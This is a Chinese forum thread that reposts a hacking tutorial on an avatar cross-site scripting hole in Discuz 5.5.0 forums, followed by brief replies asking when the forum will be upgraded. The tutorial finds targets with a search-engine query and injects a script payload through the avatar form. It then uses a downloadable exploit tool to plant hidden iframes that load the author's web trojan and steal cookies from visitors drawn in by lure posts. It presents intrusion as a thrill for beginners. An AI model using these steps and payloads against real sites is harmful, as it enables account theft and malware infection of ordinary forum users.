转贴 Discuz 5.5.0z出漏洞,建议坛主升级论坛程序
最近闲来无事的HACK,掀起了一场Discuz 5.5.0z论坛,入侵狂潮的“运动”。一时间闹整个安全界也是沸腾不已。不过各站点的站长们身手还算敏捷,Discuz 5.3.0论坛还没用多久,便换上了高版本的论坛Discuz 5.5.0版本)进行弥补漏洞。但是经过笔者测试成功,得出高级版本的Discuz程序,也是含有跨站入侵的漏洞。只是在方法有些差别而已。下文便是笔者这段时间入侵研究的心得,何不一同来领略一下入侵带来的“快感”!一、望穿秋水的“手动”入侵法
1.首先进入GOOGLE或者百度的搜索站点,在关键字处输入Powered by Discuz 5.5.0,然后单击 “目标”按钮进入。便可查找出众多使用此版本的论坛地址,这里笔者随意挑选了一个游戏公司的站点作例题讲解。进入游戏公司站点后,单击右上角 “注册”标签,弹出会员用户的注意事项,并且需要等待论坛所设置的阅读时间,然后“单击”下方同意按钮,在注册用户的必填处,填入自己的相关信息,最后单击“提交”按钮,即可成功注册。
2.会员注册成功以后,自动跳转到论坛首页。在依次进入“控制面板”→“编辑个人资料”。打开“编辑个人资料”标签,单击下方“论坛头像列表”按钮,会显示出论坛头像中的所有图片。这里笔者随意选择了一个预设的头像图片 ,并将其页面保存到本地机器中。
3.在转到本地机器,以记事本形式打开保存的页面,并单击上方“编辑”标签,选择“查找”选项,弹出查找对话框。在查找文本处输入 “<FORM action=”的字符内容(如果找不到,就直接搜索action=),然后单击目标处“查找下一个”按钮,会在记事本内容下方,选择到所要查找的目标。随后在等号后面填入WWW. GU**Y.COM.CN\,来补全提交页面的网址路径。在将其修改过的页面保存,然后在重新打开该页面,并单击 “提交”按钮。这时再回到网站的“控制面板首页”标签栏,查看一下头像是否提交成功。
小提示:因保存到本地的头像页面,采用的提交地址是相对路径,所以这里需要补全该站点的网址。否则在提交页面的同时,会显示找不到路径的404错误。如果已经填补了网址路径,并且在本地也成功的将头像提交给了该网站,大家就可以大胆的说明此网站存在头像跨站的漏洞,接下来就可以进行跨站入侵了。
4.提交头像成功以后,使用DreamWeaver网页设计软件将本地提交的页面打开,然后单击头像一的Radio空间,把选定址处改为“images/avatars/02.gif"><script>alert("曲靖提醒:贵站含有头像跨站漏洞,请采取相关的防御措施!")</script>”的代码字符。在单击“文件”菜单,选择“保存”选项,即可将修改的控件,成功保存。然后在双击打开该页面,选择头像一的单选框,并单击下方“提交”按钮。程序回显会提示:修改成功!同时刷新此页面,弹出笔者所建立的警告对话框,最后在找个热门的帖子回复一下,只要当用户打开含有笔者的帖子时,都会弹出如图3的警告对话框!
小提示:在 “控制面板首页”标签处,查看一下网页代码。只要大家稍有留意,便不难发现调用<img src="www.gu**y.com.cn/images/avatars/02.gif" width="83" height="94" border="0">的图片地址。调用代码是<img src=“$avatars”字符,所以我们可以构造一个Radio的控件值,来修改的选定值。需要用到DreamWeaver网页设计软件,或其他的网页制作软件来修改,才能自动转义其格式。而不要使用记事本的形式修改相关数值,否则会导致整体内容错乱。
二、工欲善其事必先利其器
也许繁琐的手工入侵法,不太适合菜鸟使用。不过没有关系,笔者又为众菜鸟们量身定做了,一套“傻瓜式”入侵套餐。此套餐的宗旨就是让有无基础的菜鸟朋友,都可以按着下文介绍的方法,来入侵高级版本的Discuz论坛。
前提条件:首先下载Discuz 5.5.0漏洞利用工具(下载地址:http://soft.98959.com/06/200703/61276.html),
步骤1.双击下载到桌面的“漏洞利用工具”图标,弹出程序界面,然后在第二步的文本内容处,敲入手动跨站成功的地址(www. gu**y.com.cn/)。操作完毕后,单击下方“读取参数”按钮,这时需稍等片刻后,才会出现读取成功的对话框,并单击“确定”按钮即可。
小提示:本文手动入侵和工具入侵,都是采用同一个站点做列题讲解。所以在工具入侵中,有关软件界面提示,第一步需注册站点用户,这里已经在手动入侵中注册完毕,并且已经保存了COOKIES登陆,因此笔者为了避免重复讲解,跳跃了过去。如果您在漏洞站点中,还没有注册过用户的朋友,请先去注册用户,然后在执行步骤1中的方法。
步骤2.在第三步跨站内容处输入所要插入的恶意代码,如果此时你对代码知识一无所知,可以参考左边代码助手,标签中的三个按钮。这里笔者单击“插入IFrame”按钮,会在所需的跨站内容处,出现<iframe src='' width=0 height=0></iframe>的字符代码。然后在<iframe src的等于后面,填入www.fa***d.com\fda.asp的网址,这是笔者事先制作好的网页后门地址。
小提示:代码助手中,“弹出对话框”按钮、“读取COOKIES”按钮以及插入“IFrame”按钮,分别代表当用户浏览过含有自己帖子的同时,1.会弹出如图3的警告对话框。2.得到浏览用户的COOKIES信息。3.在机器中加载网站木马的相关信息。
步骤3.输入完毕后,其他设置保持默认,然后单击“提交”按钮。执行进度框内,会呈现出写入站点代码的整个过程。但是成功与否还需要看见后面的成功提示,方可判断本次写入是否成功,这里笔者等待十秒钟后,弹出了成功的“结论”。既然恶意地址写入成功,在漏洞论坛取个诱惑力,较强的标题名称发表,从而让浏览过此帖的用户,都能重上笔者所建立的网页木马。
三、总结
Discuz 5.3.0版本的头像跨站漏洞,虽然不会危机到整个论坛的安全性能,但是它会牵扯到论坛所用户的电脑安危。小则导致重要信息被窃取,大则电脑摇身变肉鸡!
注意:本文所介绍的内容,只是告诉大家这种技术,任何人不得利用此技术做非法的事情 沙发!!!!谢谢楼主!!!::0020:: ::0020:: 坛主不管这个~~得跟geoh说 ::0020:: ::yun2:: 有什么防范方法呢?我想是有的吧::hairsmile:: 让geoh堵一下不就得了。::hairsmile:: 买袋水泥回来补一补
回复 #8 luoliantong1994年 的帖子
没人来哦~~ 西红柿兄~~到底什么时候升级啊?
页:
[1]